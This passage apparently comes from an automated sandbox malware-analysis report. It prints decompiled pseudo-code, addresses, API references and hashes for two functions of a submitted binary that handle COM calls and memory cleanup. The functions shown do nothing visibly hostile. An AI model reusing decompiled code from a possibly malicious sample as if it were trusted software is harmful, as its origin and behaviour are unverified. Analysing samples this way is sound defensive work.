                                                                                                                            • Opcode Fuzzy Hash: 1283214f7b5c66783e3c8fa32b7076d66c18768ba32f5ce754c4fbdc23786278
                                                                                                                            • Instruction Fuzzy Hash: 9DC0409034435275DD941FB17D0DB1739985F44B43F647456F40ADD1D4DF5CC900952D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041517C Relevance: 6.3, APIs: 4, Instructions: 309memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 79%
                                                                                                                            			E0041517C(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16, char _a20, signed int _a44, signed int _a48, signed int _a52, intOrPtr _a56, signed int _a60, intOrPtr _a64, char _a68, intOrPtr _a92, signed int _a96, signed int _a100, intOrPtr _a104, signed int _a108, intOrPtr _a112, signed int _a116, char _a120) {
				signed int _v4;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				void* _v40;
				char _v124;
				char _v168;
				char _v176;
				char _v184;
				signed int* __ebp;
				signed int _t131;
				signed int _t137;
				signed int _t138;
				void* _t139;
				intOrPtr* _t144;
				intOrPtr* _t147;
				signed int _t148;
				signed int _t150;
				intOrPtr* _t151;
				void* _t153;
				intOrPtr* _t157;
				signed int _t162;
				intOrPtr _t163;
				intOrPtr* _t165;
				intOrPtr* _t167;
				intOrPtr* _t175;
				intOrPtr _t177;
				signed int _t178;
				signed int _t180;
				signed int* _t181;
				void* _t182;
				intOrPtr* _t183;
				signed int _t197;
				signed int _t199;
				intOrPtr _t214;
				intOrPtr* _t216;
				intOrPtr _t217;
				signed int _t219;
				void* _t222;
				void* _t223;
				void* _t225;
				void* _t226;

				_t183 = __ecx;
				_t226 = _t225 - 0x74;
				_t219 =  &_v124;
				_t131 =  *0x441590; // 0x4917eadc
				_a116 = _t131 ^ _t219;
				_push(0x1c);
				E0041E981(E00431B8D, __ebx, __edi, __esi);
				_t216 = __ecx;
				_v16 =  *((intOrPtr*)(__ecx + 0x14));
				_a4 =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t137 =  *(__ecx + 8);
					__eflags = _t137;
					if(_t137 != 0) {
						_t209 =  &_a12;
						_t138 =  *((intOrPtr*)( *_t137 + 0xc))(_t137, 0x437adc,  &_a12,  &_a8);
						__eflags = _t138;
						if(_t138 >= 0) {
							E00411B78( &_a12,  &_a20, 0x4381f8);
							_a52 = _a52 | 0xffffffff;
							_a44 = 0;
							_a48 = 0;
							_a56 = 0x18;
							_a60 = 0;
							_a64 = 0x1fb;
							E00411B78( &_a12,  &_a68, 0x4381e0);
							_t144 = _a12;
							_a100 = _a100 | 0xffffffff;
							_t209 =  &_a20;
							_a92 = 0x1c;
							_a96 = 0;
							_a104 = 0x20;
							_a108 = 0;
							_a112 = 0x1e;
							_t178 =  *((intOrPtr*)( *_t144 + 0x10))(_t144, 2,  &_a20, 0x28, 0);
							__eflags = _t178;
							if(_t178 >= 0) {
								_t209 = 0;
								_v40 = _a8;
								_t147 = _a12;
								_v36 = 1;
								_v32 = 0;
								_v28 = 0;
								_v24 = 0;
								_t148 =  *((intOrPtr*)( *_t147 + 0x18))(_t147, 0, 0,  &_v40);
								__eflags = _t148;
								 *_t219 = _t148;
								if(_t148 >= 0) {
									 *((intOrPtr*)(_t216 + 0x14)) = _v32;
									_t150 = _v20;
									_a8 = _t150;
									 *(_t216 + 0x10) = _t150;
									_t151 = _a12;
									 *((intOrPtr*)(_t216 + 0x34)) = _v28;
									 *((intOrPtr*)( *_t151 + 8))(_t151);
									goto L31;
								} else {
									_t165 = _a12;
									 *((intOrPtr*)( *_t165 + 8))(_t165);
								}
								goto L49;
							} else {
								_t167 = _a12;
								 *((intOrPtr*)( *_t167 + 8))(_t167);
								_t138 = _t178;
							}
						}
					} else {
						_t138 = 0;
					}
					goto L50;
				} else {
					__eax =  *(__esi + 0x4c);
					__ecx =  *__eax;
					__edx =  &_a16;
					__eax =  *((intOrPtr*)(__ecx + 0x14))(__eax, 0x437cdc, __edx);
					__eflags = __eax;
					 *__ebp = __eax;
					if(__eax < 0) {
						L50:
						 *[fs:0x0] = _v12;
						_pop(_t214);
						_pop(_t217);
						_pop(_t177);
						_t139 = E0041D773(_t138, _t177, _a116 ^ _t219, _t209, _t214, _t217);
						__eflags =  &_a120;
						return _t139;
					} else {
						__eax = _a16;
						__ecx =  *__eax;
						__edx =  &_a8;
						_push( &_a8);
						_push(0x437cbc);
						_push(__eax);
						__eflags = __eax;
						if(__eflags >= 0) {
							__eax = _a8;
							__edx =  &_a12;
							_push( &_a12);
							_push(0x437dfc);
							_a12 = 0;
							__ecx =  *__eax;
							_push(__eax);
							__eflags = __eax;
							if(__eflags >= 0) {
								__eax = _a12;
								__ecx =  *__eax;
								__edx = __esi + 0x58;
								__edx =  *(__esi + 4);
								__edx =  *(__esi + 4) + 0xe8;
								__eflags = __edx;
								__eax =  *((intOrPtr*)( *__eax + 0x14))(__eax, __edx, __esi + 0x58);
								__eax = _a12;
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
							}
							__eax = _a8;
							__ecx =  *__eax;
							__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						}
						__eax = E00402521(__eflags, 0x14);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E004149CF(__eax, _a16);
						}
						 *(__esi + 0x50) = __eax;
						__eax = _a16;
						__ecx =  *__eax;
						__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						__eax =  *(__esi + 0x50);
						__ecx =  *__eax;
						__eflags =  *__eax - __edi;
						if(__eflags != 0) {
							__eflags = __eax;
							__eax = E00411DA1(__ecx, __eax);
						}
						__eax = E00402521(__eflags, 0x28);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E00410A00(__eax, __edi, 0x1f40);
						}
						__edx =  *(__esi + 0x50);
						 *(__esi + 0x54) = __eax;
						_push( *( *(__esi + 0x50)));
						__ecx = __eax;
						__eax =  *(__esi + 0x54);
						__ecx =  *(__esi + 0x50);
						 *(__ecx + 8) =  *(__esi + 0x54);
						__eax =  *(__esi + 0x54);
						__eax =  *( *(__esi + 0x54) + 0xc);
						__eflags = __eax - 0x3333333;
						 *(__esi + 0x10) = __eax;
						if(__eax <= 0x3333333) {
							__eax = __eax * 0x28;
							__imp__CoTaskMemAlloc(__eax);
							__ecx = 0;
							__eflags = __eax - __edi;
							__ecx = 0 | __eflags != 0x00000000;
							 *(__esi + 0x14) = __eax;
							if(__eflags != 0) {
								 *(__esi + 0x10) =  *(__esi + 0x10) * 0x28;
								__eax = E0041EC90(__edi, __eax, __edi,  *(__esi + 0x10) * 0x28);
								__ecx =  *(__esi + 0x50);
								__eax = E004149F1( *(__esi + 0x50));
								__ecx =  *(__esi + 0x50);
								__eax = E00411D5E(__ecx);
								L31:
								__eflags =  *(_t216 + 0x10);
								_a16 = 0;
								if( *(_t216 + 0x10) > 0) {
									_t182 = 0;
									__eflags = 0;
									do {
										_t162 = E00402521(__eflags, 0x1c);
										_a8 = _t162;
										__eflags = _t162;
										_v4 = 0;
										if(_t162 == 0) {
											_t163 = 0;
											__eflags = 0;
										} else {
											_t163 = E00419390(_t162, 0xa);
										}
										_v4 = _v4 | 0xffffffff;
										_a16 = _a16 + 1;
										 *((intOrPtr*)(_t182 +  *((intOrPtr*)(_t216 + 0x14)) + 0x24)) = _t163;
										_t182 = _t182 + 0x28;
										__eflags = _a16 -  *(_t216 + 0x10);
									} while (__eflags < 0);
								}
								_t180 = _v16;
								__eflags = _t180;
								if(_t180 != 0) {
									__eflags = _a4;
									if(_a4 > 0) {
										_t153 = 0xffffffdc;
										_t181 = _t180 + 0x24;
										_a16 = _a4;
										_a8 = _t153 - _v16;
										while(1) {
											_t197 =  *( *_t181 + 4);
											__eflags = _t197;
											_a4 = _t197;
											if(_t197 == 0) {
												goto L45;
											}
											while(1) {
												_t157 = E00403A5E( &_a4);
												_t209 =  *_t216;
												 *((intOrPtr*)( *_t216 + 8))( *_t157, 1);
												__eflags = _a4;
												if(_a4 == 0) {
													goto L45;
												}
											}
											L45:
											E004192B8( *_t181);
											_t199 =  *_t181;
											__eflags = _t199;
											if(_t199 != 0) {
												 *((intOrPtr*)( *_t199 + 4))(1);
											}
											_t181 =  &(_t181[0xa]);
											_t126 =  &_a16;
											 *_t126 = _a16 - 1;
											__eflags =  *_t126;
											if( *_t126 != 0) {
												continue;
											}
											goto L48;
										}
									}
									L48:
									__imp__CoTaskMemFree(_v16);
								}
								L49:
								_t138 =  *_t219;
								goto L50;
							} else {
								_push(_t219);
								_t222 = _t226;
								_push(_t183);
								_v168 = 0x4407c8;
								E00420866( &_v168, 0x43b874);
								asm("int3");
								_push(_t222);
								_t223 = _t226;
								_push(_t183);
								_v176 = 0x440860;
								E00420866( &_v176, 0x43b8b8);
								asm("int3");
								_push(_t223);
								_push(_t183);
								_v184 = 0x4408f8;
								E00420866( &_v184, 0x43b8fc);
								asm("int3");
								_t175 = _t183;
								 *((intOrPtr*)(_t175 + 4)) = 1;
								return _t175;
							}
						} else {
							__eax = 0x8007000e;
							goto L50;
						}
					}
				}
			}

















































                                                                                                                            0x0041517c
                                                                                                                            0x0041517d
                                                                                                                            0x00415180
                                                                                                                            0x00415184
                                                                                                                            0x0041518b
                                                                                                                            0x0041518e
                                                                                                                            0x00415195
                                                                                                                            0x0041519a
                                                                                                                            0x0041519f
                                                                                                                            0x004151aa
                                                                                                                            0x004151ad
                                                                                                                            0x004152f2
                                                                                                                            0x004152f5
                                                                                                                            0x004152f7
                                                                                                                            0x00415306
                                                                                                                            0x00415310
                                                                                                                            0x00415313
                                                                                                                            0x00415315
                                                                                                                            0x00415326
                                                                                                                            0x0041532b
                                                                                                                            0x0041533a
                                                                                                                            0x0041533d
                                                                                                                            0x00415340
                                                                                                                            0x00415347
                                                                                                                            0x0041534a
                                                                                                                            0x00415351
                                                                                                                            0x00415356
                                                                                                                            0x00415359
                                                                                                                            0x00415360
                                                                                                                            0x00415366
                                                                                                                            0x0041536d
                                                                                                                            0x00415370
                                                                                                                            0x00415377
                                                                                                                            0x0041537a
                                                                                                                            0x00415387
                                                                                                                            0x00415389
                                                                                                                            0x0041538b
                                                                                                                            0x004153a4
                                                                                                                            0x004153a7
                                                                                                                            0x004153aa
                                                                                                                            0x004153b0
                                                                                                                            0x004153b7
                                                                                                                            0x004153ba
                                                                                                                            0x004153bd
                                                                                                                            0x004153c3
                                                                                                                            0x004153c6
                                                                                                                            0x004153c8
                                                                                                                            0x004153cb
                                                                                                                            0x004153e1
                                                                                                                            0x004153e4
                                                                                                                            0x004153e7
                                                                                                                            0x004153ea
                                                                                                                            0x004153ed
                                                                                                                            0x004153f0
                                                                                                                            0x004153f6
                                                                                                                            0x00000000
                                                                                                                            0x004153cd
                                                                                                                            0x004153cd
                                                                                                                            0x004153d3
                                                                                                                            0x004153d3
                                                                                                                            0x00000000
                                                                                                                            0x0041538d
                                                                                                                            0x0041538d
                                                                                                                            0x00415393
                                                                                                                            0x00415396
                                                                                                                            0x00415396
                                                                                                                            0x0041538b
                                                                                                                            0x004152f9
                                                                                                                            0x004152f9
                                                                                                                            0x004152f9
                                                                                                                            0x00000000
                                                                                                                            0x004151b3
                                                                                                                            0x004151b3
                                                                                                                            0x004151b6
                                                                                                                            0x004151b8
                                                                                                                            0x004151c2
                                                                                                                            0x004151c5
                                                                                                                            0x004151c7
                                                                                                                            0x004151ca
                                                                                                                            0x004154ba
                                                                                                                            0x004154bd
                                                                                                                            0x004154c5
                                                                                                                            0x004154c6
                                                                                                                            0x004154c7
                                                                                                                            0x004154cd
                                                                                                                            0x004154d2
                                                                                                                            0x004154d6
                                                                                                                            0x004151d0
                                                                                                                            0x004151d0
                                                                                                                            0x004151d3
                                                                                                                            0x004151d5
                                                                                                                            0x004151d8
                                                                                                                            0x004151d9
                                                                                                                            0x004151de
                                                                                                                            0x004151e1
                                                                                                                            0x004151e3
                                                                                                                            0x004151e5
                                                                                                                            0x004151e8
                                                                                                                            0x004151eb
                                                                                                                            0x004151ec
                                                                                                                            0x004151f1
                                                                                                                            0x004151f4
                                                                                                                            0x004151f6
                                                                                                                            0x004151fa
                                                                                                                            0x004151fc
                                                                                                                            0x004151fe
                                                                                                                            0x00415201
                                                                                                                            0x00415203
                                                                                                                            0x00415207
                                                                                                                            0x0041520a
                                                                                                                            0x0041520a
                                                                                                                            0x00415212
                                                                                                                            0x00415215
                                                                                                                            0x00415218
                                                                                                                            0x0041521b
                                                                                                                            0x0041521b
                                                                                                                            0x0041521e
                                                                                                                            0x00415221
                                                                                                                            0x00415224
                                                                                                                            0x00415224
                                                                                                                            0x00415229
                                                                                                                            0x0041522e
                                                                                                                            0x00415231
                                                                                                                            0x0041523f
                                                                                                                            0x0041523f
                                                                                                                            0x00415233
                                                                                                                            0x00415236
                                                                                                                            0x00415238
                                                                                                                            0x00415238
                                                                                                                            0x00415241
                                                                                                                            0x00415244
                                                                                                                            0x00415247
                                                                                                                            0x0041524a
                                                                                                                            0x0041524d
                                                                                                                            0x00415250
                                                                                                                            0x00415252
                                                                                                                            0x00415254
                                                                                                                            0x00415256
                                                                                                                            0x0041525b
                                                                                                                            0x0041525b
                                                                                                                            0x00415262
                                                                                                                            0x00415267
                                                                                                                            0x0041526a
                                                                                                                            0x0041527b
                                                                                                                            0x0041527b
                                                                                                                            0x0041526c
                                                                                                                            0x00415272
                                                                                                                            0x00415274
                                                                                                                            0x00415274
                                                                                                                            0x0041527d
                                                                                                                            0x00415280
                                                                                                                            0x00415283
                                                                                                                            0x00415285
                                                                                                                            0x0041528c
                                                                                                                            0x0041528f
                                                                                                                            0x00415292
                                                                                                                            0x00415295
                                                                                                                            0x00415298
                                                                                                                            0x0041529b
                                                                                                                            0x004152a0
                                                                                                                            0x004152a3
                                                                                                                            0x004152af
                                                                                                                            0x004152b3
                                                                                                                            0x004152b9
                                                                                                                            0x004152bb
                                                                                                                            0x004152bd
                                                                                                                            0x004152c0
                                                                                                                            0x004152c5
                                                                                                                            0x004152cf
                                                                                                                            0x004152d5
                                                                                                                            0x004152da
                                                                                                                            0x004152e0
                                                                                                                            0x004152e5
                                                                                                                            0x004152e8
                                                                                                                            0x004153f9
                                                                                                                            0x004153f9
                                                                                                                            0x004153fc
                                                                                                                            0x004153ff
                                                                                                                            0x00415401
                                                                                                                            0x00415401
                                                                                                                            0x00415403
                                                                                                                            0x00415405
                                                                                                                            0x0041540b
                                                                                                                            0x0041540e
                                                                                                                            0x00415410
                                                                                                                            0x00415413
                                                                                                                            0x00415420
                                                                                                                            0x00415420
                                                                                                                            0x00415415
                                                                                                                            0x00415419
                                                                                                                            0x00415419
                                                                                                                            0x00415422
                                                                                                                            0x00415429
                                                                                                                            0x0041542c
                                                                                                                            0x00415433
                                                                                                                            0x00415436
                                                                                                                            0x00415436
                                                                                                                            0x00415403
                                                                                                                            0x0041543b
                                                                                                                            0x0041543e
                                                                                                                            0x00415440
                                                                                                                            0x00415442
                                                                                                                            0x00415445
                                                                                                                            0x0041544c
                                                                                                                            0x0041544d
                                                                                                                            0x00415453
                                                                                                                            0x00415456
                                                                                                                            0x0041545e
                                                                                                                            0x00415460
                                                                                                                            0x00415463
                                                                                                                            0x00415465
                                                                                                                            0x00415468
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041546f
                                                                                                                            0x0041547c
                                                                                                                            0x00415483
                                                                                                                            0x0041548a
                                                                                                                            0x0041548d
                                                                                                                            0x00415490
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041546c
                                                                                                                            0x00415492
                                                                                                                            0x00415494
                                                                                                                            0x00415499
                                                                                                                            0x0041549b
                                                                                                                            0x0041549d
                                                                                                                            0x004154a3
                                                                                                                            0x004154a3
                                                                                                                            0x004154a6
                                                                                                                            0x004154a9
                                                                                                                            0x004154a9
                                                                                                                            0x004154a9
                                                                                                                            0x004154ac
                                                                                                                            0x00000000
                                                                                                                            0x0041545b
                                                                                                                            0x00000000
                                                                                                                            0x004154ac
                                                                                                                            0x0041545e
                                                                                                                            0x004154ae
                                                                                                                            0x004154b1
                                                                                                                            0x004154b1
                                                                                                                            0x004154b7
                                                                                                                            0x004154b7
                                                                                                                            0x00000000
                                                                                                                            0x004152c7
                                                                                                                            0x0040d87c
                                                                                                                            0x0040d87d
                                                                                                                            0x0040d87f
                                                                                                                            0x0040d889
                                                                                                                            0x0040d890
                                                                                                                            0x0040d895
                                                                                                                            0x0040d896
                                                                                                                            0x0040d897
                                                                                                                            0x0040d899
                                                                                                                            0x0040d8a3
                                                                                                                            0x0040d8aa
                                                                                                                            0x0040d8af
                                                                                                                            0x0040d8b0
                                                                                                                            0x0040d8b3
                                                                                                                            0x0040d8bd
                                                                                                                            0x0040d8c4
                                                                                                                            0x0040d8c9
                                                                                                                            0x0040d8ca
                                                                                                                            0x0040d8cc
                                                                                                                            0x0040d8d3
                                                                                                                            0x0040d8d3
                                                                                                                            0x004152a5
                                                                                                                            0x004152a5
                                                                                                                            0x00000000
                                                                                                                            0x004152a5
                                                                                                                            0x004152a3
                                                                                                                            0x004151ca

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3.LIBCMT ref: 00415195
                                                                                                                            • CoTaskMemAlloc.OLE32(?,?), ref: 004152B3
                                                                                                                            • _memset.LIBCMT ref: 004152D5
                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 004154B1
                                                                                                                              • Part of subcall function 00402521: _malloc.LIBCMT ref: 0040253B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2459298410-0
                                                                                                                            • Opcode ID: ff9ccc9a6cec49871c1f89d87922bdcd48dd12471c24b3bc669cef4e0832d0eb
                                                                                                                            • Instruction ID: bb9792871f65d6e9d9b31f79dca034b014fb8b1a785e64f995e3022e9e93fb7a
                                                                                                                            • Opcode Fuzzy Hash: ff9ccc9a6cec49871c1f89d87922bdcd48dd12471c24b3bc669cef4e0832d0eb
                                                                                                                            • Instruction Fuzzy Hash: 1DC106B0600609EFCB14DF69C885AEAB7F5FF88304B14891EF816CB291D778E985CB54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00416028 Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 71%
                                                                                                                            			E00416028(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr _t85;
				intOrPtr* _t86;
				intOrPtr _t101;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t145;
				intOrPtr* _t151;
				intOrPtr* _t159;
				intOrPtr _t160;
				intOrPtr _t161;
				void* _t162;
				void* _t163;
				intOrPtr _t165;
				intOrPtr* _t166;
				void* _t167;
				intOrPtr _t179;

				_push(0x10);
				E0041E981(E00431C49, __ebx, __edi, __esi);
				_t165 = __ecx;
				 *((intOrPtr*)(_t167 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x43510c;
				 *(_t167 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					L11:
					while( *((intOrPtr*)(_t165 + 0x24)) != 0) {
						_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x1c)) + 8));
						__eflags = _t159;
						if(_t159 == 0) {
							break;
						}
						_t151 =  *_t159;
						__eflags = _t151;
						if(_t151 == 0) {
							break;
						}
						 *((intOrPtr*)( *_t151 + 0xbc))( *((intOrPtr*)(_t159 + 8)), 0);
						 *((intOrPtr*)( *_t159 + 0x98)) = 0;
					}
					 *((intOrPtr*)(_t167 - 0x18)) = _t165 + 0x18;
					E004192B8(_t165 + 0x18);
					if( *((intOrPtr*)(_t165 + 0x40)) == 0) {
						L19:
						_t83 =  *((intOrPtr*)(_t165 + 8));
						if(_t83 != 0) {
							 *((intOrPtr*)( *_t83 + 8))(_t83);
						}
						_t84 =  *((intOrPtr*)(_t165 + 0xc));
						if(_t84 != 0) {
							 *((intOrPtr*)( *_t84 + 8))(_t84);
						}
						if( *((intOrPtr*)(_t165 + 0x14)) == 0) {
							L32:
							_t85 =  *((intOrPtr*)(_t165 + 0x34));
							if(_t85 != 0) {
								__imp__CoTaskMemFree(_t85);
							}
							_t136 =  *((intOrPtr*)(_t165 + 0x54));
							if( *((intOrPtr*)(_t165 + 0x54)) != 0) {
								E00414A3C(_t136,  *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x50)))));
								E00410A29( *((intOrPtr*)(_t165 + 0x54)));
							}
							_t160 =  *((intOrPtr*)(_t165 + 0x54));
							_t191 = _t160;
							if(_t160 != 0) {
								E00410A29(_t160);
								_push(_t160);
								E0040254C(0, _t157, _t160, _t165, _t191);
							}
							_t161 =  *((intOrPtr*)(_t165 + 0x50));
							_t192 = _t161;
							if(_t161 != 0) {
								E00415E07(_t161, _t192);
								_push(_t161);
								E0040254C(0, _t157, _t161, _t165, _t192);
							}
							_t86 =  *((intOrPtr*)(_t165 + 0x4c));
							if(_t86 != 0) {
								 *((intOrPtr*)( *_t86 + 8))(_t86);
							}
							_t166 =  *((intOrPtr*)(_t165 + 0x48));
							if(_t166 != 0) {
								 *((intOrPtr*)( *_t166 + 8))(_t166);
							}
							 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
							return E0041EA59(E004193B3( *((intOrPtr*)(_t167 - 0x18))));
						} else {
							 *((intOrPtr*)(_t167 - 0x10)) = 0;
							if( *((intOrPtr*)(_t165 + 0x10)) <= 0) {
								L31:
								__imp__CoTaskMemFree( *((intOrPtr*)(_t165 + 0x14)));
								goto L32;
							}
							_t162 = 0;
							do {
								_t101 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x14)) + _t162 + 0x24)) + 4));
								 *((intOrPtr*)(_t167 - 0x14)) = _t101;
								if(_t101 == 0) {
									goto L28;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((intOrPtr*)( *((intOrPtr*)(E00403A5E(_t167 - 0x14))) + 0x98)) = 0;
								} while ( *((intOrPtr*)(_t167 - 0x14)) != 0);
								L28:
								E004192B8( *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x14)) + _t162 + 0x24)));
								_t145 =  *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x14)) + _t162 + 0x24));
								if(_t145 != 0) {
									 *((intOrPtr*)( *_t145 + 4))(1);
								}
								 *((intOrPtr*)(_t167 - 0x10)) =  *((intOrPtr*)(_t167 - 0x10)) + 1;
								_t162 = _t162 + 0x28;
							} while ( *((intOrPtr*)(_t167 - 0x10)) <  *((intOrPtr*)(_t165 + 0x10)));
							goto L31;
						}
					}
					_t163 = 0;
					if( *((intOrPtr*)(_t165 + 0x38)) <= 0) {
						L17:
						if(_t179 != 0) {
							_push( *((intOrPtr*)(_t165 + 0x3c)));
							E0040254C(0, _t157, _t163, _t165, _t179);
							_push( *((intOrPtr*)(_t165 + 0x40)));
							E0040254C(0, _t157, _t163, _t165, _t179);
						}
						goto L19;
					}
					 *((intOrPtr*)(_t167 - 0x10)) = 0;
					do {
						__imp__#9( *((intOrPtr*)(_t165 + 0x40)) +  *((intOrPtr*)(_t167 - 0x10)));
						 *((intOrPtr*)(_t167 - 0x10)) =  *((intOrPtr*)(_t167 - 0x10)) + 0x10;
						_t163 = _t163 + 1;
					} while (_t163 <  *((intOrPtr*)(_t165 + 0x38)));
					_t179 =  *((intOrPtr*)(_t165 + 0x38));
					goto L17;
				}
				_t121 =  *((intOrPtr*)(__ecx + 0x50));
				if(_t121 == 0) {
					goto L11;
				}
				_t122 =  *_t121;
				_t157 = _t167 - 0x14;
				_push(_t167 - 0x14);
				_push(0x437cbc);
				_push(_t122);
				if( *((intOrPtr*)( *_t122))() < 0) {
					goto L11;
				}
				_t124 =  *((intOrPtr*)(_t167 - 0x14));
				if(_t124 == 0) {
					goto L11;
				}
				_t157 = _t167 - 0x10;
				_push(_t167 - 0x10);
				_push(0x437dfc);
				 *((intOrPtr*)(_t167 - 0x10)) = 0;
				_push(_t124);
				if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
					_t128 =  *((intOrPtr*)(_t167 - 0x10));
					if(_t128 != 0) {
						 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
						_t130 =  *((intOrPtr*)(_t167 - 0x10));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
					}
				}
				_t126 =  *((intOrPtr*)(_t167 - 0x14));
				 *((intOrPtr*)( *_t126 + 8))(_t126);
				goto L11;
			}

























                                                                                                                            0x00416028
                                                                                                                            0x0041602f
                                                                                                                            0x00416034
                                                                                                                            0x00416036
                                                                                                                            0x00416039
                                                                                                                            0x00416044
                                                                                                                            0x00416047
                                                                                                                            0x00000000
                                                                                                                            0x004160cd
                                                                                                                            0x004160ac
                                                                                                                            0x004160af
                                                                                                                            0x004160b1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004160b3
                                                                                                                            0x004160b5
                                                                                                                            0x004160b7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004160bf
                                                                                                                            0x004160c7
                                                                                                                            0x004160c7
                                                                                                                            0x004160d5
                                                                                                                            0x004160d8
                                                                                                                            0x004160e0
                                                                                                                            0x0041611a
                                                                                                                            0x0041611a
                                                                                                                            0x0041611f
                                                                                                                            0x00416124
                                                                                                                            0x00416124
                                                                                                                            0x00416127
                                                                                                                            0x0041612c
                                                                                                                            0x00416131
                                                                                                                            0x00416131
                                                                                                                            0x00416137
                                                                                                                            0x004161a6
                                                                                                                            0x004161a6
                                                                                                                            0x004161ab
                                                                                                                            0x004161ae
                                                                                                                            0x004161ae
                                                                                                                            0x004161b4
                                                                                                                            0x004161b9
                                                                                                                            0x004161c0
                                                                                                                            0x004161c8
                                                                                                                            0x004161c8
                                                                                                                            0x004161cd
                                                                                                                            0x004161d0
                                                                                                                            0x004161d2
                                                                                                                            0x004161d6
                                                                                                                            0x004161db
                                                                                                                            0x004161dc
                                                                                                                            0x004161e1
                                                                                                                            0x004161e2
                                                                                                                            0x004161e5
                                                                                                                            0x004161e7
                                                                                                                            0x004161eb
                                                                                                                            0x004161f0
                                                                                                                            0x004161f1
                                                                                                                            0x004161f6
                                                                                                                            0x004161f7
                                                                                                                            0x004161fc
                                                                                                                            0x00416201
                                                                                                                            0x00416201
                                                                                                                            0x00416204
                                                                                                                            0x00416209
                                                                                                                            0x0041620e
                                                                                                                            0x0041620e
                                                                                                                            0x00416214
                                                                                                                            0x00416222
                                                                                                                            0x00416139
                                                                                                                            0x0041613c
                                                                                                                            0x0041613f
                                                                                                                            0x0041619d
                                                                                                                            0x004161a0
                                                                                                                            0x00000000
                                                                                                                            0x004161a0
                                                                                                                            0x00416141
                                                                                                                            0x00416143
                                                                                                                            0x0041614a
                                                                                                                            0x0041614f
                                                                                                                            0x00416152
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00416154
                                                                                                                            0x00416154
                                                                                                                            0x00416169
                                                                                                                            0x00416169
                                                                                                                            0x00416171
                                                                                                                            0x00416178
                                                                                                                            0x00416180
                                                                                                                            0x00416186
                                                                                                                            0x0041618c
                                                                                                                            0x0041618c
                                                                                                                            0x0041618f
                                                                                                                            0x00416195
                                                                                                                            0x00416198
                                                                                                                            0x00000000
                                                                                                                            0x00416143
                                                                                                                            0x00416137
                                                                                                                            0x004160e2
                                                                                                                            0x004160e7
                                                                                                                            0x00416106
                                                                                                                            0x00416106
                                                                                                                            0x00416108
                                                                                                                            0x0041610b
                                                                                                                            0x00416110
                                                                                                                            0x00416113
                                                                                                                            0x00416119
                                                                                                                            0x00000000
                                                                                                                            0x00416106
                                                                                                                            0x004160e9
                                                                                                                            0x004160ec
                                                                                                                            0x004160f3
                                                                                                                            0x004160f9
                                                                                                                            0x004160fd
                                                                                                                            0x004160fe
                                                                                                                            0x00416103
                                                                                                                            0x00000000
                                                                                                                            0x00416103
                                                                                                                            0x0041604d
                                                                                                                            0x00416052
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00416054
